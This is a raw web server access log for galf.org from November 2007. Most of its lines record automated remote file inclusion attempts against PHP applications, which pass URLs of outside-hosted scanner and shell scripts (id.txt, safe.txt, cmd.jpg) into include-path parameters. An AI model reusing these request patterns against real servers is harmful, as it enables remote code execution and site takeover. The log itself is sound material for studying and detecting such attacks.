64.233.80.78 - - [18/Nov/2007:19:29:52 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:10 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:10 -0800] "GET //pub08_comments.php?basePath=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:11 -0800] "GET /logs//pub08_comments.php?basePath=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:21 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.218.34 - - [18/Nov/2007:19:30:22 -0800] "GET //pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:23 -0800] "GET /logs//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:57 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:30:58 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:31:03 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:31:41 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:19:34:08 -0800] "GET /logs/access_070806.log/index.php?pagina=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:35:35 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:35:35 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:38:30 -0800] "GET /logs//mygallerybrowser.php?myPath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:38:30 -0800] "GET //mygallerybrowser.php?myPath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:38:43 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:38:43 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:38:44 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:38:46 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:38:47 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.103.160.53 - - [18/Nov/2007:19:38:47 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:41:12 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:41:12 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.80 - - [18/Nov/2007:19:43:15 -0800] "GET /logs/access_070730.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:19:43:15 -0800] "GET /logs/index.php?include=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:19:43:16 -0800] "GET /index.php?include=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:43:43 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:43:43 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:19:45:21 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:19:45:21 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:19:46:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:19:46:04 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:19:47:21 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:19:47:21 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:48:50 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:48:50 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:48:59 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:49:00 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:49:00 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.218.34 - - [18/Nov/2007:19:49:00 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:49:00 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:49:00 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.180.250.107 - - [18/Nov/2007:19:50:04 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.218.34 - - [18/Nov/2007:19:50:10 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:50:10 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:50:11 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.26.219 - - [18/Nov/2007:19:50:40 -0800] "GET /logs/access_070528.log HTTP/1.0" 200 253171 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:50:49 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:50:49 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:50:49 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.3.226.2 - - [18/Nov/2007:19:51:04 -0800] "GET /logs//mygallerybrowser.php?myPath=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.3.226.2 - - [18/Nov/2007:19:51:05 -0800] "GET //mygallerybrowser.php?myPath=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:19:51:29 -0800] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:19:51:35 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.30.216.95 - - [18/Nov/2007:19:51:52 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.3.226.2 - - [18/Nov/2007:19:53:06 -0800] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.3.226.2 - - [18/Nov/2007:19:53:07 -0800] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
38.99.13.122 - - [18/Nov/2007:19:53:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "galf.org"
74.6.22.170 - - [18/Nov/2007:19:57:11 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.249.73.202 - - [18/Nov/2007:19:57:29 -0800] "GET /cendoc/pdf/Bermudez-Derechos.pdf HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:19:58:49 -0800] "GET //index.php?include=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:59:17 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:59:17 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:19:59:21 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:59:26 -0800] "GET /logs/access_071022.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.126.193.82 - - [18/Nov/2007:20:00:02 -0800] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
194.126.193.82 - - [18/Nov/2007:20:00:18 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
201.240.58.149 - - [18/Nov/2007:20:01:28 -0800] "GET / HTTP/1.1" 200 1048 "http://www.runa.org.pe/divsexual/enlaces.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:01:37 -0800] "GET /logs/ HTTP/1.1" 200 5371 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:01:45 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:01:48 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:01:50 -0800] "GET /logs/ HTTP/1.1" 200 5371 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:01:52 -0800] "GET /logs/access.log HTTP/1.1" 200 115033 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:20:01:58 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:01:59 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:02:01 -0800] "GET /logs/ HTTP/1.1" 200 5371 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:02:09 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
201.240.58.149 - - [18/Nov/2007:20:02:11 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
69.10.137.218 - - [18/Nov/2007:20:03:03 -0800] "GET /logs//oneadmin/adminhead.php?path[docroot]=http://port-forward.net/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.10.137.218 - - [18/Nov/2007:20:03:03 -0800] "GET //oneadmin/adminhead.php?path[docroot]=http://port-forward.net/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:20:08:14 -0800] "GET /logs/access_070730.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:20:10:04 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:20:10:05 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:20:10:05 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:20:10:41 -0800] "GET /logs//newspublish/home.print.php?path[docroot]=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:20:10:42 -0800] "GET //newspublish/home.print.php?path[docroot]=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:20:11:05 -0800] "GET /logs/access_071029.log/index.php?pag=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:20:11:05 -0800] "GET /index.php?pag=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.168.55.27 - - [18/Nov/2007:20:11:06 -0800] "GET /logs/index.php?pag=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:20:12:41 -0800] "GET /logs/access_070917.log/index.php?content=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:20:12:41 -0800] "GET /index.php?content=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:20:12:42 -0800] "GET /logs/index.php?content=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:20:14:37 -0800] "GET /logs/access_071015.log/index.php?pag=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.109.89.253 - - [18/Nov/2007:20:15:02 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.109.89.253 - - [18/Nov/2007:20:15:02 -0800] "GET //ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:20:15:06 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:20:17:28 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:20:17:28 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:20:02 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:20:20:20 -0800] "GET /logs/lib/gore.php?libpath=http://cats.art.free.fr/catsite/img/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:20:20:22 -0800] "GET /lib/gore.php?libpath=http://cats.art.free.fr/catsite/img/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:20:20:26 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:20:20:28 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:20:20:30 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:21:28 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:21:41 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:21:51 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.218.34 - - [18/Nov/2007:20:22:12 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:22:13 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:22:13 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.115.183.162 - - [18/Nov/2007:20:22:19 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.115.183.162 - - [18/Nov/2007:20:22:19 -0800] "GET //ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:22:19 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:22:19 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:22:19 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.115.183.162 - - [18/Nov/2007:20:22:51 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.115.183.162 - - [18/Nov/2007:20:22:51 -0800] "GET //ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
